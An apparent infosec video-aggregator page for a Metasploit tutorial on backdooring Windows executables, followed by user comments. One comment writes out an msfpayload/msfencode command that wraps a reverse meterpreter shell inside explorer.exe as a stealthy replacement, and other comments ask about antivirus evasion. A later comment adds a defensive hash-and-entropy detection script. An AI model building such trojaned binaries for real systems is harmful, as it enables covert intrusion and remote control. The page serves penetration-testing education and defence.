Description:
This is Part 14 of the Metasploit Megaprimer series.
Please begin this series by watching Part 1 of the Metasploit Megaprimer series, if you have not already done so. In this video, we will learn how to backdoor EXE files. We will first look at how to use Msfpayload to create EXEs for arbitrary payloads. Then we will learn about the need for encoding and how to encode payloads using a variety of encoders with Msfencode. We will also look at how to take an existing executable, such as notepad.exe, and backdoor it with our payload.
We would request that you all leave your feedback in the comments section below the video!
In the next video, we will look at the Pass-the-Hash Attack!!
Please watch this video in FULL SCREEN mode.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Comments:
These tutorials are fantastic, I appreciate how you face the problems and errors that show up during your demos and make sure that what you wanted to happen does happen no matter what.
Do you think metasploit could take advantage of alternative streams to place the backdoor in a template, keep its properties, and remain hidden?
Another excellent job.
I used this exploit on a few Windows OSes, Windows 7 with patches and Windows XP. It works perfectly with anti-virus disabled and if I allow bind_tcp_encoded through ZoneAlarm.
What I need to find out is whether there's a way not to trigger an alarm from the AV.
Hey Vivek,
Love the vids man, keep up the great work! We used your buffer overflow set of primer videos extensively during a university project on buffer overflows. Really helped us out there :)
After looking over the section on persistence and metsvc, I wasn't really happy with these as backdoor solutions from a counter-forensics point of view. Creating additional files in the filesystem just isn't stealth enough for me! ;)
This video in particular got me thinking of backdoors from a different point of view. My plan is to use the final technique in this video to encode a meterpreter reverse shell into the regularly used explorer.exe. The theory being that when the attacker has control of the system, they replace C:\WINDOWS\explorer.exe with the malicious executable, maintaining the functionality of explorer.exe but with an added shiny new reverse meterpreter shell...
Well, I did some playing about and successfully created the new executable with the following command:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 R | msfencode -e x86/shikata_ga_nai -t exe -x explorer.exe -o ~/explorer.exe -k
This was a good start and I was able to get a meterpreter session providing the listener was running on the attacker side.
The problem I encountered was as follows: If a listener is present on the hacker machine, a remote meterpreter shell is achieved and explorer behaves as normal. However if a listener is not present, explorer immediately crashes and restarts. This happens repeatedly every 2-3 seconds! Obviously from a stealth perspective this completely failed! haha! Any ideas what is happening here buddy? Is there any way to avoid this or should I forget about explorer.exe and pick a less critical exe? My main thought was that explorer.exe is always run, and is thus a reliable backdoor...
Thanks mate, hope all is well,
Dan
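From the defender's side, the two things a practitioner wants against the technique shown in the video (a backdoored notepad.exe) and the explorer.exe replacement Dan describes above are a known-good hash baseline for system binaries and a heuristic for spotting the encoded payload region that an encoder such as shikata_ga_nai leaves behind. The script below is an added example, not code from the video, from this page's comments or from the Metasploit project. All of its names are assumptions of this example: the function names, the 512-byte window, the 7.0 bits/byte threshold, and the sample "binaries", which are constructed byte strings rather than real Windows executables.

```python
import hashlib
import math
import random
from typing import Dict, List

WINDOW = 512             # bytes per entropy window (assumed value)
ENTROPY_THRESHOLD = 7.0  # bits/byte; text and ordinary x86 code sit well below this


def sha256_hex(data: bytes) -> str:
    """SHA-256 of a file's contents, hex encoded."""
    return hashlib.sha256(data).hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for one repeated value, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def high_entropy_windows(data: bytes, window: int = WINDOW,
                         threshold: float = ENTROPY_THRESHOLD) -> List[int]:
    """Offsets of fixed-size windows whose entropy exceeds the threshold.
    An encoded payload stub is close to random, so it stands out inside a binary
    that is otherwise text, tables and code. Packed or compressed sections score
    high as well, so treat a hit as a triage signal, not as proof of tampering."""
    return [off for off in range(0, len(data), window)
            if shannon_entropy(data[off:off + window]) > threshold]


def check_integrity(baseline: Dict[str, str], current: Dict[str, bytes]) -> List[str]:
    """Names of files that are missing or whose SHA-256 no longer matches the baseline."""
    return sorted(name for name, good in baseline.items()
                  if name not in current or sha256_hex(current[name]) != good)


# Constructed sample data (hypothetical stand-ins, not real Windows binaries).
_rng = random.Random(1234)
CLEAN = (b"MZ" + b"This program cannot be run in DOS mode.\r\n" * 200)[:4096]
_PAYLOAD = bytes(_rng.getrandbits(8) for _ in range(1024))  # stands in for an encoded stub
BACKDOORED = CLEAN[:1024] + _PAYLOAD + CLEAN[2048:]         # same size and header as CLEAN

# Baseline hashes would normally come from trusted install media or a vendor catalog.
BASELINE = {"explorer.exe": sha256_hex(CLEAN), "notepad.exe": sha256_hex(CLEAN)}


def triage(files: Dict[str, bytes]) -> Dict[str, dict]:
    """Run both checks over a set of files and return per-file findings."""
    changed = set(check_integrity(BASELINE, files))
    return {name: {"hash_mismatch": name in changed,
                   "high_entropy_windows": high_entropy_windows(data)}
            for name, data in files.items()}


if __name__ == "__main__":
    for name, finding in triage({"explorer.exe": BACKDOORED, "notepad.exe": CLEAN}).items():
        print(name, finding)
```

On a real host the hash comparison is the decisive check and the entropy scan only tells you where to look; verifying the Authenticode signature of a system binary (for example with Get-AuthenticodeSignature in PowerShell) is the stronger first step, since a re-encoded explorer.exe or notepad.exe no longer carries a valid vendor signature.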
Great video as always. Keep it up.
Another great megaprimer! Thanks for sharing all of this! o/
Thanks for the effort Vivek!!
Qn: My wishlist is for msfencoder to encode the payload in other formats such as *.avi and *.mp3. The payload should be embedded in such a way that the *.avi still gets executed along with the payload.
No alarms there!! Is it possible Vivek??
Thanks for all the comments guys! We have launched a SecurityTube Metasploit Framework Expert Certification today:
http://www.securitytube.net/smfe
The first 25 signups will receive discounted seats! Please hurry :)
To get to know Metasploit in more depth, visit the Amantes do Metasploit forum, where you will find a lot of material in Portuguese:
http://www.amantesdometasploit.com.br
Hi Vivek, I'm loving all the videos. I love this one too; going from the port scanning to exploitation was a bit quick. It's not just you, all the tutorials I've seen or read go something like: "ok, we scan the host and see port n open, so we deploy the xyz exploit". How do you find out which exploit to use? Is it just experience? Surely even you can't know every exploit ever written.
It's a tiny thing; love the videos, the quality is way higher than most I have seen. Thanks.